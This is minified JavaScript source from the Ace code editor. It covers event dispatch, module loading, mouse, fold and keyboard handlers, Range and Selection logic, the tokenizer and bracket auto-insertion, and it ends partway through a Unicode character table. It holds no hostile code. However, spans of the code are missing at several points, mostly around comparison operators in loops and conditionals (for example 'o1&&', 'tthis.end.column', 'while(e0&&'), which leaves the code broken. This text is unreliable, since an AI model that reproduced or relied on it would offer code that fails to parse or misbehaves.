r={},i=function(){this.propagationStopped=!0},s=function(){this.defaultPrevented=!0};r._emit=r._dispatchEvent=function(e,t){this._eventRegistry||(this._eventRegistry={}),this._defaultHandlers||(this._defaultHandlers={});var n=this._eventRegistry[e]||[],r=this._defaultHandlers[e];if(!n.length&&!r)return;if(typeof t!="object"||!t)t={};t.type||(t.type=e),t.stopPropagation||(t.stopPropagation=i),t.preventDefault||(t.preventDefault=s),n=n.slice();for(var o=0;o1&&(i=n[n.length-2]);var o=a[t+"Path"];return o==null?o=a.basePath:r=="/"&&(t=r=""),o&&o.slice(-1)!="/"&&(o+="/"),o+t+r+i+this.get("suffix")},t.setModuleUrl=function(e,t){return a.$moduleUrls[e]=t},t.$loading={},t.loadModule=function(n,r){var i,o;Array.isArray(n)&&(o=n[0],n=n[1]);try{i=e(n)}catch(u){}if(i&&!t.$loading[n])return r&&r(i);t.$loading[n]||(t.$loading[n]=[]),t.$loading[n].push(r);if(t.$loading[n].length>1)return;var a=function(){e([n],function(e){t._emit("load.module",{name:n,module:e});var r=t.$loading[n];t.$loading[n]=null,r.forEach(function(t){t&&t(e)})})};if(!t.get("packaged"))return a();s.loadScript(t.moduleUrl(n,o),a)},t.init=f}),ace.define("ace/mouse/mouse_handler",["require","exports","module","ace/lib/event","ace/lib/useragent","ace/mouse/default_handlers","ace/mouse/default_gutter_handler","ace/mouse/mouse_event","ace/mouse/dragdrop_handler","ace/config"],function(e,t,n){"use strict";var r=e("../lib/event"),i=e("../lib/useragent"),s=e("./default_handlers").DefaultHandlers,o=e("./default_gutter_handler").GutterHandler,u=e("./mouse_event").MouseEvent,a=e("./dragdrop_handler").DragdropHandler,f=e("../config"),l=function(e){var t=this;this.editor=e,new s(this),new o(this),new a(this);var n=function(t){var n=!document.hasFocus||!document.hasFocus()||!e.isFocused()&&document.activeElement==(e.textInput&&e.textInput.getElement());n&&window.focus(),e.focus()},u=e.renderer.getMouseEventTarget();r.addListener(u,"click",this.onMouseEvent.bind(this,"click")),r.addListener(u,"mousemove",this.onMouseMove.bind(this,"mousemove")),r.addMultiMouseDownListener([u,e.renderer.scrollBarV&&e.renderer.scrollBarV.inner,e.renderer.scrollBarH&&e.renderer.scrollBarH.inner,e.textInput&&e.textInput.getElement()].filter(Boolean),[400,300,250],this,"onMouseEvent"),r.addMouseWheelListener(e.container,this.onMouseWheel.bind(this,"mousewheel")),r.addTouchMoveListener(e.container,this.onTouchMove.bind(this,"touchmove"));var f=e.renderer.$gutter;r.addListener(f,"mousedown",this.onMouseEvent.bind(this,"guttermousedown")),r.addListener(f,"click",this.onMouseEvent.bind(this,"gutterclick")),r.addListener(f,"dblclick",this.onMouseEvent.bind(this,"gutterdblclick")),r.addListener(f,"mousemove",this.onMouseEvent.bind(this,"guttermousemove")),r.addListener(u,"mousedown",n),r.addListener(f,"mousedown",n),i.isIE&&e.renderer.scrollBarV&&(r.addListener(e.renderer.scrollBarV.element,"mousedown",n),r.addListener(e.renderer.scrollBarH.element,"mousedown",n)),e.on("mousemove",function(n){if(t.state||t.$dragDelay||!t.$dragEnabled)return;var r=e.renderer.screenToTextCoordinates(n.x,n.y),i=e.session.selection.getRange(),s=e.renderer;!i.isEmpty()&&i.insideStart(r.row,r.column)?s.setCursorStyle("default"):s.setCursorStyle("")})};(function(){this.onMouseEvent=function(e,t){this.editor._emit(e,new u(t,this.editor))},this.onMouseMove=function(e,t){var n=this.editor._eventRegistry&&this.editor._eventRegistry.mousemove;if(!n||!n.length)return;this.editor._emit(e,new u(t,this.editor))},this.onMouseWheel=function(e,t){var n=new u(t,this.editor);n.speed=this.$scrollSpeed*2,n.wheelX=t.wheelX,n.wheelY=t.wheelY,this.editor._emit(e,n)},this.onTouchMove=function(e,t){var n=new u(t,this.editor);n.speed=1,n.wheelX=t.wheelX,n.wheelY=t.wheelY,this.editor._emit(e,n)},this.setState=function(e){this.state=e},this.captureMouse=function(e,t){this.x=e.x,this.y=e.y,this.isMousePressed=!0;var n=this.editor.renderer;n.$keepTextAreaAtCursor&&(n.$keepTextAreaAtCursor=null);var s=this,o=function(e){if(!e)return;if(i.isWebKit&&!e.which&&s.releaseMouse)return s.releaseMouse();s.x=e.clientX,s.y=e.clientY,t&&t(e),s.mouseEvent=new u(e,s.editor),s.$mouseMoved=!0},a=function(e){clearInterval(l),f(),s[s.state+"End"]&&s[s.state+"End"](e),s.state="",n.$keepTextAreaAtCursor==null&&(n.$keepTextAreaAtCursor=!0,n.$moveTextAreaToCursor()),s.isMousePressed=!1,s.$onCaptureMouseMove=s.releaseMouse=null,e&&s.onMouseEvent("mouseup",e)},f=function(){s[s.state]&&s[s.state](),s.$mouseMoved=!1};if(i.isOldIE&&e.domEvent.type=="dblclick")return setTimeout(function(){a(e)});s.$onCaptureMouseMove=o,s.releaseMouse=r.capture(this.editor.container,o,a);var l=setInterval(f,20)},this.releaseMouse=null,this.cancelContextMenu=function(){var e=function(t){if(t&&t.domEvent&&t.domEvent.type!="contextmenu")return;this.editor.off("nativecontextmenu",e),t&&t.domEvent&&r.stopEvent(t.domEvent)}.bind(this);setTimeout(e,10),this.editor.on("nativecontextmenu",e)}}).call(l.prototype),f.defineOptions(l.prototype,"mouseHandler",{scrollSpeed:{initialValue:2},dragDelay:{initialValue:i.isMac?150:0},dragEnabled:{initialValue:!0},focusTimout:{initialValue:0},tooltipFollowsMouse:{initialValue:!0}}),t.MouseHandler=l}),ace.define("ace/mouse/fold_handler",["require","exports","module"],function(e,t,n){"use strict";function r(e){e.on("click",function(t){var n=t.getDocumentPosition(),r=e.session,i=r.getFoldAt(n.row,n.column,1);i&&(t.getAccelKey()?r.removeFold(i):r.expandFold(i),t.stop())}),e.on("gutterclick",function(t){var n=e.renderer.$gutterLayer.getRegion(t);if(n=="foldWidgets"){var r=t.getDocumentPosition().row,i=e.session;i.foldWidgets&&i.foldWidgets[r]&&e.session.onFoldWidgetClick(r,t),e.isFocused()||e.focus(),t.stop()}}),e.on("gutterdblclick",function(t){var n=e.renderer.$gutterLayer.getRegion(t);if(n=="foldWidgets"){var r=t.getDocumentPosition().row,i=e.session,s=i.getParentFoldRangeData(r,!0),o=s.range||s.firstRange;if(o){r=o.start.row;var u=i.getFoldAt(r,i.getLine(r).length,1);u?i.removeFold(u):(i.addFold("...",o),e.renderer.scrollCursorIntoView({row:o.start.row,column:0}))}t.stop()}})}t.FoldHandler=r}),ace.define("ace/keyboard/keybinding",["require","exports","module","ace/lib/keys","ace/lib/event"],function(e,t,n){"use strict";var r=e("../lib/keys"),i=e("../lib/event"),s=function(e){this.$editor=e,this.$data={editor:e},this.$handlers=[],this.setDefaultHandler(e.commands)};(function(){this.setDefaultHandler=function(e){this.removeKeyboardHandler(this.$defaultHandler),this.$defaultHandler=e,this.addKeyboardHandler(e,0)},this.setKeyboardHandler=function(e){var t=this.$handlers;if(t[t.length-1]==e)return;while(t[t.length-1]&&t[t.length-1]!=this.$defaultHandler)this.removeKeyboardHandler(t[t.length-1]);this.addKeyboardHandler(e,1)},this.addKeyboardHandler=function(e,t){if(!e)return;typeof e=="function"&&!e.handleKeyboard&&(e.handleKeyboard=e);var n=this.$handlers.indexOf(e);n!=-1&&this.$handlers.splice(n,1),t==undefined?this.$handlers.push(e):this.$handlers.splice(t,0,e),n==-1&&e.attach&&e.attach(this.$editor)},this.removeKeyboardHandler=function(e){var t=this.$handlers.indexOf(e);return t==-1?!1:(this.$handlers.splice(t,1),e.detach&&e.detach(this.$editor),!0)},this.getKeyboardHandler=function(){return this.$handlers[this.$handlers.length-1]},this.getStatusText=function(){var e=this.$data,t=e.editor;return this.$handlers.map(function(n){return n.getStatusText&&n.getStatusText(t,e)||""}).filter(Boolean).join(" ")},this.$callKeyboardHandlers=function(e,t,n,r){var s,o=!1,u=this.$editor.commands;for(var a=this.$handlers.length;a--;){s=this.$handlers[a].handleKeyboard(this.$data,e,t,n,r);if(!s||!s.command)continue;s.command=="null"?o=!0:o=u.exec(s.command,this.$editor,s.args,r),o&&r&&e!=-1&&s.passEvent!=1&&s.command.passEvent!=1&&i.stopEvent(r);if(o)break}return!o&&e==-1&&(s={command:"insertstring"},o=u.exec("insertstring",this.$editor,t)),o&&this.$editor._signal&&this.$editor._signal("keyboardActivity",s),o},this.onCommandKey=function(e,t,n){var i=r.keyCodeToString(n);this.$callKeyboardHandlers(t,i,n,e)},this.onTextInput=function(e){this.$callKeyboardHandlers(-1,e)}}).call(s.prototype),t.KeyBinding=s}),ace.define("ace/range",["require","exports","module"],function(e,t,n){"use strict";var r=function(e,t){return e.row-t.row||e.column-t.column},i=function(e,t,n,r){this.start={row:e,column:t},this.end={row:n,column:r}};(function(){this.isEqual=function(e){return this.start.row===e.start.row&&this.end.row===e.end.row&&this.start.column===e.start.column&&this.end.column===e.end.column},this.toString=function(){return"Range: ["+this.start.row+"/"+this.start.column+"] -> ["+this.end.row+"/"+this.end.column+"]"},this.contains=function(e,t){return this.compare(e,t)==0},this.compareRange=function(e){var t,n=e.end,r=e.start;return t=this.compare(n.row,n.column),t==1?(t=this.compare(r.row,r.column),t==1?2:t==0?1:0):t==-1?-2:(t=this.compare(r.row,r.column),t==-1?-1:t==1?42:0)},this.comparePoint=function(e){return this.compare(e.row,e.column)},this.containsRange=function(e){return this.comparePoint(e.start)==0&&this.comparePoint(e.end)==0},this.intersects=function(e){var t=this.compareRange(e);return t==-1||t==0||t==1},this.isEnd=function(e,t){return this.end.row==e&&this.end.column==t},this.isStart=function(e,t){return this.start.row==e&&this.start.column==t},this.setStart=function(e,t){typeof e=="object"?(this.start.column=e.column,this.start.row=e.row):(this.start.row=e,this.start.column=t)},this.setEnd=function(e,t){typeof e=="object"?(this.end.column=e.column,this.end.row=e.row):(this.end.row=e,this.end.column=t)},this.inside=function(e,t){return this.compare(e,t)==0?this.isEnd(e,t)||this.isStart(e,t)?!1:!0:!1},this.insideStart=function(e,t){return this.compare(e,t)==0?this.isEnd(e,t)?!1:!0:!1},this.insideEnd=function(e,t){return this.compare(e,t)==0?this.isStart(e,t)?!1:!0:!1},this.compare=function(e,t){return!this.isMultiLine()&&e===this.start.row?tthis.end.column?1:0:ethis.end.row?1:this.start.row===e?t>=this.start.column?0:-1:this.end.row===e?t<=this.end.column?0:1:0},this.compareStart=function(e,t){return this.start.row==e&&this.start.column==t?-1:this.compare(e,t)},this.compareEnd=function(e,t){return this.end.row==e&&this.end.column==t?1:this.compare(e,t)},this.compareInside=function(e,t){return this.end.row==e&&this.end.column==t?1:this.start.row==e&&this.start.column==t?-1:this.compare(e,t)},this.clipRows=function(e,t){if(this.end.row>t)var n={row:t+1,column:0};else if(this.end.rowt)var r={row:t+1,column:0};else if(this.start.rowt.row||e.row==t.row&&e.column>t.column},this.getRange=function(){var e=this.anchor,t=this.lead;return this.isEmpty()?o.fromPoints(t,t):this.isBackwards()?o.fromPoints(t,e):o.fromPoints(e,t)},this.clearSelection=function(){this.$isEmpty||(this.$isEmpty=!0,this._emit("changeSelection"))},this.selectAll=function(){var e=this.doc.getLength()-1;this.setSelectionAnchor(0,0),this.moveCursorTo(e,this.doc.getLine(e).length)},this.setRange=this.setSelectionRange=function(e,t){t?(this.setSelectionAnchor(e.end.row,e.end.column),this.selectTo(e.start.row,e.start.column)):(this.setSelectionAnchor(e.start.row,e.start.column),this.selectTo(e.end.row,e.end.column)),this.getRange().isEmpty()&&(this.$isEmpty=!0),this.$desiredColumn=null},this.$moveSelection=function(e){var t=this.lead;this.$isEmpty&&this.setSelectionAnchor(t.row,t.column),e.call(this)},this.selectTo=function(e,t){this.$moveSelection(function(){this.moveCursorTo(e,t)})},this.selectToPosition=function(e){this.$moveSelection(function(){this.moveCursorToPosition(e)})},this.moveTo=function(e,t){this.clearSelection(),this.moveCursorTo(e,t)},this.moveToPosition=function(e){this.clearSelection(),this.moveCursorToPosition(e)},this.selectUp=function(){this.$moveSelection(this.moveCursorUp)},this.selectDown=function(){this.$moveSelection(this.moveCursorDown)},this.selectRight=function(){this.$moveSelection(this.moveCursorRight)},this.selectLeft=function(){this.$moveSelection(this.moveCursorLeft)},this.selectLineStart=function(){this.$moveSelection(this.moveCursorLineStart)},this.selectLineEnd=function(){this.$moveSelection(this.moveCursorLineEnd)},this.selectFileEnd=function(){this.$moveSelection(this.moveCursorFileEnd)},this.selectFileStart=function(){this.$moveSelection(this.moveCursorFileStart)},this.selectWordRight=function(){this.$moveSelection(this.moveCursorWordRight)},this.selectWordLeft=function(){this.$moveSelection(this.moveCursorWordLeft)},this.getWordRange=function(e,t){if(typeof t=="undefined"){var n=e||this.lead;e=n.row,t=n.column}return this.session.getWordRange(e,t)},this.selectWord=function(){this.setSelectionRange(this.getWordRange())},this.selectAWord=function(){var e=this.getCursor(),t=this.session.getAWordRange(e.row,e.column);this.setSelectionRange(t)},this.getLineRange=function(e,t){var n=typeof e=="number"?e:this.lead.row,r,i=this.session.getFoldLine(n);return i?(n=i.start.row,r=i.end.row):r=n,t===!0?new o(n,0,r,this.session.getLine(r).length):new o(n,0,r+1,0)},this.selectLine=function(){this.setSelectionRange(this.getLineRange())},this.moveCursorUp=function(){this.moveCursorBy(-1,0)},this.moveCursorDown=function(){this.moveCursorBy(1,0)},this.moveCursorLeft=function(){var e=this.lead.getPosition(),t;if(t=this.session.getFoldAt(e.row,e.column,-1))this.moveCursorTo(t.start.row,t.start.column);else if(e.column===0)e.row>0&&this.moveCursorTo(e.row-1,this.doc.getLine(e.row-1).length);else{var n=this.session.getTabSize();this.session.isTabStop(e)&&this.doc.getLine(e.row).slice(e.column-n,e.column).split(" ").length-1==n?this.moveCursorBy(0,-n):this.moveCursorBy(0,-1)}},this.moveCursorRight=function(){var e=this.lead.getPosition(),t;if(t=this.session.getFoldAt(e.row,e.column,1))this.moveCursorTo(t.end.row,t.end.column);else if(this.lead.column==this.doc.getLine(this.lead.row).length)this.lead.row0&&(t.column=r)}}this.moveCursorTo(t.row,t.column)},this.moveCursorFileEnd=function(){var e=this.doc.getLength()-1,t=this.doc.getLine(e).length;this.moveCursorTo(e,t)},this.moveCursorFileStart=function(){this.moveCursorTo(0,0)},this.moveCursorLongWordRight=function(){var e=this.lead.row,t=this.lead.column,n=this.doc.getLine(e),r=n.substring(t),i;this.session.nonTokenRe.lastIndex=0,this.session.tokenRe.lastIndex=0;var s=this.session.getFoldAt(e,t,1);if(s){this.moveCursorTo(s.end.row,s.end.column);return}if(i=this.session.nonTokenRe.exec(r))t+=this.session.nonTokenRe.lastIndex,this.session.nonTokenRe.lastIndex=0,r=n.substring(t);if(t>=n.length){this.moveCursorTo(e,n.length),this.moveCursorRight(),e0&&this.moveCursorWordLeft();return}if(o=this.session.tokenRe.exec(s))t-=this.session.tokenRe.lastIndex,this.session.tokenRe.lastIndex=0;this.moveCursorTo(e,t)},this.$shortWordEndIndex=function(e){var t,n=0,r,i=/\s/,s=this.session.tokenRe;s.lastIndex=0;if(t=this.session.tokenRe.exec(e))n=this.session.tokenRe.lastIndex;else{while((r=e[n])&&i.test(r))n++;if(n<1){s.lastIndex=0;while((r=e[n])&&!s.test(r)){s.lastIndex=0,n++;if(i.test(r)){if(n>2){n--;break}while((r=e[n])&&i.test(r))n++;if(n>2)break}}}}return s.lastIndex=0,n},this.moveCursorShortWordRight=function(){var e=this.lead.row,t=this.lead.column,n=this.doc.getLine(e),r=n.substring(t),i=this.session.getFoldAt(e,t,1);if(i)return this.moveCursorTo(i.end.row,i.end.column);if(t==n.length){var s=this.doc.getLength();do e++,r=this.doc.getLine(e);while(e0&&/^\s*$/.test(r));t=r.length,/\s+$/.test(r)||(r="")}var s=i.stringReverse(r),o=this.$shortWordEndIndex(s);return this.moveCursorTo(e,t-o)},this.moveCursorWordRight=function(){this.session.$selectLongWords?this.moveCursorLongWordRight():this.moveCursorShortWordRight()},this.moveCursorWordLeft=function(){this.session.$selectLongWords?this.moveCursorLongWordLeft():this.moveCursorShortWordLeft()},this.moveCursorBy=function(e,t){var n=this.session.documentToScreenPosition(this.lead.row,this.lead.column);t===0&&(this.$desiredColumn?n.column=this.$desiredColumn:this.$desiredColumn=n.column);var r=this.session.screenToDocumentPosition(n.row+e,n.column);e!==0&&t===0&&r.row===this.lead.row&&r.column===this.lead.column&&this.session.lineWidgets&&this.session.lineWidgets[r.row]&&(r.row>0||e>0)&&r.row++,this.moveCursorTo(r.row,r.column+t,t===0)},this.moveCursorToPosition=function(e){this.moveCursorTo(e.row,e.column)},this.moveCursorTo=function(e,t,n){var r=this.session.getFoldAt(e,t,1);r&&(e=r.start.row,t=r.start.column),this.$keepDesiredColumnOnChange=!0,this.lead.setPosition(e,t),this.$keepDesiredColumnOnChange=!1,n||(this.$desiredColumn=null)},this.moveCursorToScreen=function(e,t,n){var r=this.session.screenToDocumentPosition(e,t);this.moveCursorTo(r.row,r.column,n)},this.detach=function(){this.lead.detach(),this.anchor.detach(),this.session=this.doc=null},this.fromOrientedRange=function(e){this.setSelectionRange(e,e.cursor==e.start),this.$desiredColumn=e.desiredColumn||this.$desiredColumn},this.toOrientedRange=function(e){var t=this.getRange();return e?(e.start.column=t.start.column,e.start.row=t.start.row,e.end.column=t.end.column,e.end.row=t.end.row):e=t,e.cursor=this.isBackwards()?e.start:e.end,e.desiredColumn=this.$desiredColumn,e},this.getRangeOfMovements=function(e){var t=this.getCursor();try{e(this);var n=this.getCursor();return o.fromPoints(t,n)}catch(r){return o.fromPoints(t,t)}finally{this.moveCursorToPosition(t)}},this.toJSON=function(){if(this.rangeCount)var e=this.ranges.map(function(e){var t=e.clone();return t.isBackwards=e.cursor==e.start,t});else{var e=this.getRange();e.isBackwards=this.isBackwards()}return e},this.fromJSON=function(e){if(e.start==undefined){if(this.rangeList){this.toSingleRange(e[0]);for(var t=e.length;t--;){var n=o.fromPoints(e[t].start,e[t].end);e[t].isBackwards&&(n.cursor=n.start),this.addRange(n,!0)}return}e=e[0]}this.rangeList&&this.toSingleRange(e),this.setSelectionRange(e,e.isBackwards)},this.isEqual=function(e){if((e.length||this.rangeCount)&&e.length!=this.rangeCount)return!1;if(!e.length||!this.ranges)return this.getRange().isEqual(e);for(var t=this.ranges.length;t--;)if(!this.ranges[t].isEqual(e[t]))return!1;return!0}}).call(u.prototype),t.Selection=u}),ace.define("ace/tokenizer",["require","exports","module","ace/config"],function(e,t,n){"use strict";var r=e("./config"),i=2e3,s=function(e){this.states=e,this.regExps={},this.matchMappings={};for(var t in this.states){var n=this.states[t],r=[],i=0,s=this.matchMappings[t]={defaultToken:"text"},o="g",u=[];for(var a=0;a1?f.onMatch=this.$applyToken:f.onMatch=f.token),c>1&&(/\\\d/.test(f.regex)?l=f.regex.replace(/\\([0-9]+)/g,function(e,t){return"\\"+(parseInt(t,10)+i+1)}):(c=1,l=this.removeCapturingGroups(f.regex)),!f.splitRegex&&typeof f.token!="string"&&u.push(f)),s[i]=a,i+=c,r.push(l),f.onMatch||(f.onMatch=null)}r.length||(s[0]=0,r.push("$")),u.forEach(function(e){e.splitRegex=this.createSplitterRegexp(e.regex,o)},this),this.regExps[t]=new RegExp("("+r.join(")|(")+")|($)",o)}};(function(){this.$setMaxTokenCount=function(e){i=e|0},this.$applyToken=function(e){var t=this.splitRegex.exec(e).slice(1),n=this.token.apply(this,t);if(typeof n=="string")return[{type:n,value:e}];var r=[];for(var i=0,s=n.length;il){var g=e.substring(l,m-v.length);h.type==p?h.value+=g:(h.type&&f.push(h),h={type:p,value:g})}for(var y=0;yi){c>2*e.length&&this.reportError("infinite loop with in ace tokenizer",{startState:t,line:e});while(l1&&n[0]!==r&&n.unshift("#tmp",r),{tokens:f,state:n.length?n:r}},this.reportError=r.reportError}).call(s.prototype),t.Tokenizer=s}),ace.define("ace/mode/text_highlight_rules",["require","exports","module","ace/lib/lang"],function(e,t,n){"use strict";var r=e("../lib/lang"),i=function(){this.$rules={start:[{token:"empty_line",regex:"^$"},{defaultToken:"text"}]}};(function(){this.addRules=function(e,t){if(!t){for(var n in e)this.$rules[n]=e[n];return}for(var n in e){var r=e[n];for(var i=0;i=this.$rowTokens.length){this.$row+=1,e||(e=this.$session.getLength());if(this.$row>=e)return this.$row=e-1,null;this.$rowTokens=this.$session.getTokens(this.$row),this.$tokenIndex=0}return this.$rowTokens[this.$tokenIndex]},this.getCurrentToken=function(){return this.$rowTokens[this.$tokenIndex]},this.getCurrentTokenRow=function(){return this.$row},this.getCurrentTokenColumn=function(){var e=this.$rowTokens,t=this.$tokenIndex,n=e[t].start;if(n!==undefined)return n;n=0;while(t>0)t-=1,n+=e[t].value.length;return n},this.getCurrentTokenPosition=function(){return{row:this.$row,column:this.getCurrentTokenColumn()}}}).call(r.prototype),t.TokenIterator=r}),ace.define("ace/mode/behaviour/cstyle",["require","exports","module","ace/lib/oop","ace/mode/behaviour","ace/token_iterator","ace/lib/lang"],function(e,t,n){"use strict";var r=e("../../lib/oop"),i=e("../behaviour").Behaviour,s=e("../../token_iterator").TokenIterator,o=e("../../lib/lang"),u=["text","paren.rparen","punctuation.operator"],a=["text","paren.rparen","punctuation.operator","comment"],f,l={},c=function(e){var t=-1;e.multiSelect&&(t=e.selection.index,l.rangeCount!=e.multiSelect.rangeCount&&(l={rangeCount:e.multiSelect.rangeCount}));if(l[t])return f=l[t];f=l[t]={autoInsertedBrackets:0,autoInsertedRow:-1,autoInsertedLineEnd:"",maybeInsertedBrackets:0,maybeInsertedRow:-1,maybeInsertedLineStart:"",maybeInsertedLineEnd:""}},h=function(e,t,n,r){var i=e.end.row-e.start.row;return{text:n+t+r,selection:[0,e.start.column+1,i,e.end.column+(i?0:1)]}},p=function(){this.add("braces","insertion",function(e,t,n,r,i){var s=n.getCursorPosition(),u=r.doc.getLine(s.row);if(i=="{"){c(n);var a=n.getSelectionRange(),l=r.doc.getTextRange(a);if(l!==""&&l!=="{"&&n.getWrapBehavioursEnabled())return h(a,l,"{","}");if(p.isSaneInsertion(n,r))return/[\]\}\)]/.test(u[s.column])||n.inMultiSelectMode?(p.recordAutoInsert(n,r,"}"),{text:"{}",selection:[1,1]}):(p.recordMaybeInsert(n,r,"{"),{text:"{",selection:[1,1]})}else if(i=="}"){c(n);var d=u.substring(s.column,s.column+1);if(d=="}"){var v=r.$findOpeningBracket("}",{column:s.column+1,row:s.row});if(v!==null&&p.isAutoInsertedClosing(s,u,i))return p.popAutoInsertedClosing(),{text:"",selection:[1,1]}}}else{if(i=="\n"||i=="\r\n"){c(n);var m="";p.isMaybeInsertedClosing(s,u)&&(m=o.stringRepeat("}",f.maybeInsertedBrackets),p.clearMaybeInsertedClosing());var d=u.substring(s.column,s.column+1);if(d==="}"){var g=r.findMatchingBracket({row:s.row,column:s.column+1},"}");if(!g)return null;var y=this.$getIndent(r.getLine(g.row))}else{if(!m){p.clearMaybeInsertedClosing();return}var y=this.$getIndent(u)}var b=y+r.getTabString();return{text:"\n"+b+"\n"+y+m,selection:[1,b.length,1,b.length]}}p.clearMaybeInsertedClosing()}}),this.add("braces","deletion",function(e,t,n,r,i){var s=r.doc.getTextRange(i);if(!i.isMultiLine()&&s=="{"){c(n);var o=r.doc.getLine(i.start.row),u=o.substring(i.end.column,i.end.column+1);if(u=="}")return i.end.column++,i;f.maybeInsertedBrackets--}}),this.add("parens","insertion",function(e,t,n,r,i){if(i=="("){c(n);var s=n.getSelectionRange(),o=r.doc.getTextRange(s);if(o!==""&&n.getWrapBehavioursEnabled())return h(s,o,"(",")");if(p.isSaneInsertion(n,r))return p.recordAutoInsert(n,r,")"),{text:"()",selection:[1,1]}}else if(i==")"){c(n);var u=n.getCursorPosition(),a=r.doc.getLine(u.row),f=a.substring(u.column,u.column+1);if(f==")"){var l=r.$findOpeningBracket(")",{column:u.column+1,row:u.row});if(l!==null&&p.isAutoInsertedClosing(u,a,i))return p.popAutoInsertedClosing(),{text:"",selection:[1,1]}}}}),this.add("parens","deletion",function(e,t,n,r,i){var s=r.doc.getTextRange(i);if(!i.isMultiLine()&&s=="("){c(n);var o=r.doc.getLine(i.start.row),u=o.substring(i.start.column+1,i.start.column+2);if(u==")")return i.end.column++,i}}),this.add("brackets","insertion",function(e,t,n,r,i){if(i=="["){c(n);var s=n.getSelectionRange(),o=r.doc.getTextRange(s);if(o!==""&&n.getWrapBehavioursEnabled())return h(s,o,"[","]");if(p.isSaneInsertion(n,r))return p.recordAutoInsert(n,r,"]"),{text:"[]",selection:[1,1]}}else if(i=="]"){c(n);var u=n.getCursorPosition(),a=r.doc.getLine(u.row),f=a.substring(u.column,u.column+1);if(f=="]"){var l=r.$findOpeningBracket("]",{column:u.column+1,row:u.row});if(l!==null&&p.isAutoInsertedClosing(u,a,i))return p.popAutoInsertedClosing(),{text:"",selection:[1,1]}}}}),this.add("brackets","deletion",function(e,t,n,r,i){var s=r.doc.getTextRange(i);if(!i.isMultiLine()&&s=="["){c(n);var o=r.doc.getLine(i.start.row),u=o.substring(i.start.column+1,i.start.column+2);if(u=="]")return i.end.column++,i}}),this.add("string_dquotes","insertion",function(e,t,n,r,i){if(i=='"'||i=="'"){if(this.lineCommentStart&&this.lineCommentStart.indexOf(i)!=-1)return;c(n);var s=i,o=n.getSelectionRange(),u=r.doc.getTextRange(o);if(u!==""&&u!=="'"&&u!='"'&&n.getWrapBehavioursEnabled())return h(o,u,s,s);if(!u){var a=n.getCursorPosition(),f=r.doc.getLine(a.row),l=f.substring(a.column-1,a.column),p=f.substring(a.column,a.column+1),d=r.getTokenAt(a.row,a.column),v=r.getTokenAt(a.row,a.column+1);if(l=="\\"&&d&&/escape/.test(d.type))return null;var m=d&&/string|escape/.test(d.type),g=!v||/string|escape/.test(v.type),y;if(p==s)y=m!==g,y&&/string\.end/.test(v.type)&&(y=!1);else{if(m&&!g)return null;if(m&&g)return null;var b=r.$mode.tokenRe;b.lastIndex=0;var w=b.test(l);b.lastIndex=0;var E=b.test(l);if(w||E)return null;if(p&&!/[\s;,.})\]\\]/.test(p))return null;y=!0}return{text:y?s+s:"",selection:[1,1]}}}}),this.add("string_dquotes","deletion",function(e,t,n,r,i){var s=r.doc.getTextRange(i);if(!i.isMultiLine()&&(s=='"'||s=="'")){c(n);var o=r.doc.getLine(i.start.row),u=o.substring(i.start.column+1,i.start.column+2);if(u==s)return i.end.column++,i}})};p.isSaneInsertion=function(e,t){var n=e.getCursorPosition(),r=new s(t,n.row,n.column);if(!this.$matchTokenType(r.getCurrentToken()||"text",u)){var i=new s(t,n.row,n.column+1);if(!this.$matchTokenType(i.getCurrentToken()||"text",u))return!1}return r.stepForward(),r.getCurrentTokenRow()!==n.row||this.$matchTokenType(r.getCurrentToken()||"text",a)},p.$matchTokenType=function(e,t){return t.indexOf(e.type||e)>-1},p.recordAutoInsert=function(e,t,n){var r=e.getCursorPosition(),i=t.doc.getLine(r.row);this.isAutoInsertedClosing(r,i,f.autoInsertedLineEnd[0])||(f.autoInsertedBrackets=0),f.autoInsertedRow=r.row,f.autoInsertedLineEnd=n+i.substr(r.column),f.autoInsertedBrackets++},p.recordMaybeInsert=function(e,t,n){var r=e.getCursorPosition(),i=t.doc.getLine(r.row);this.isMaybeInsertedClosing(r,i)||(f.maybeInsertedBrackets=0),f.maybeInsertedRow=r.row,f.maybeInsertedLineStart=i.substr(0,r.column)+n,f.maybeInsertedLineEnd=i.substr(r.column),f.maybeInsertedBrackets++},p.isAutoInsertedClosing=function(e,t,n){return f.autoInsertedBrackets>0&&e.row===f.autoInsertedRow&&n===f.autoInsertedLineEnd[0]&&t.substr(e.column)===f.autoInsertedLineEnd},p.isMaybeInsertedClosing=function(e,t){return f.maybeInsertedBrackets>0&&e.row===f.maybeInsertedRow&&t.substr(e.column)===f.maybeInsertedLineEnd&&t.substr(0,e.column)==f.maybeInsertedLineStart},p.popAutoInsertedClosing=function(){f.autoInsertedLineEnd=f.autoInsertedLineEnd.substr(1),f.autoInsertedBrackets--},p.clearMaybeInsertedClosing=function(){f&&(f.maybeInsertedBrackets=0,f.maybeInsertedRow=-1)},r.inherits(p,i),t.CstyleBehaviour=p}),ace.define("ace/unicode",["require","exports","module"],function(e,t,n){"use strict";function r(e){var n=/\w{4}/g;for(var r in e)t.packages[r]=e[r].replace(n,"\\u$&")}t.packages={},r({L:"0041-005A0061-007A00AA00B500BA00C0-00D600D8-00F600F8-02C102C6-02D102E0-02E402EC02EE0370-037403760377037A-037D03860388-038A038C038E-03A103A3-03F503F7-0481048A-05250531-055605590561-058705D0-05EA05F0-05F20621-064A066E066F0671-06D306D506E506E606EE06EF06FA-06FC06FF07100712-072F074D-07A507B107CA-07EA07F407F507FA0800-0815081A082408280904-0939093D09500958-0961097109720979-097F0985-098C098F09900993-09A809AA-09B009B209B6-09B909BD09CE09DC09DD09DF-09E109F009F10A05-0A0A0A0F0A100A13-0A280A2A-0A300A320A330A350A360A380A390A59-0A5C0A5E0A72-0A740A85-0A8D0A8F-0A910A93-0AA80AAA-0AB00AB20AB30AB5-0AB90ABD0AD00AE00AE10B05-0B0C0B0F0B100B13-0B280B2A-0B300B320B330B35-0B390B3D0B5C0B5D0B5F-0B610B710B830B85-0B8A0B8E-0B900B92-0B950B990B9A0B9C0B9E0B9F0BA30BA40BA8-0BAA0BAE-0BB90BD00C05-0C0C0C0E-0C100C12-0C280C2A-0C330C35-0C390C3D0C580C590C600C610C85-0C8C0C8E-0C900C92-0CA80CAA-0CB30CB5-0CB90CBD0CDE0CE00CE10D05-0D0C0D0E-0D100D12-0D280D2A-0D390D3D0D600D610D7A-0D7F0D85-0D960D9A-0DB10DB3-0DBB0DBD0DC0-0DC60E01-0E300E320E330E40-0E460E810E820E840E870E880E8A0E8D0E94-0E970E99-0E9F0EA1-0EA30EA50EA70EAA0EAB0EAD-0EB00EB20EB30EBD0EC0-0EC40EC60EDC0EDD0F000F40-0F470F49-0F6C0F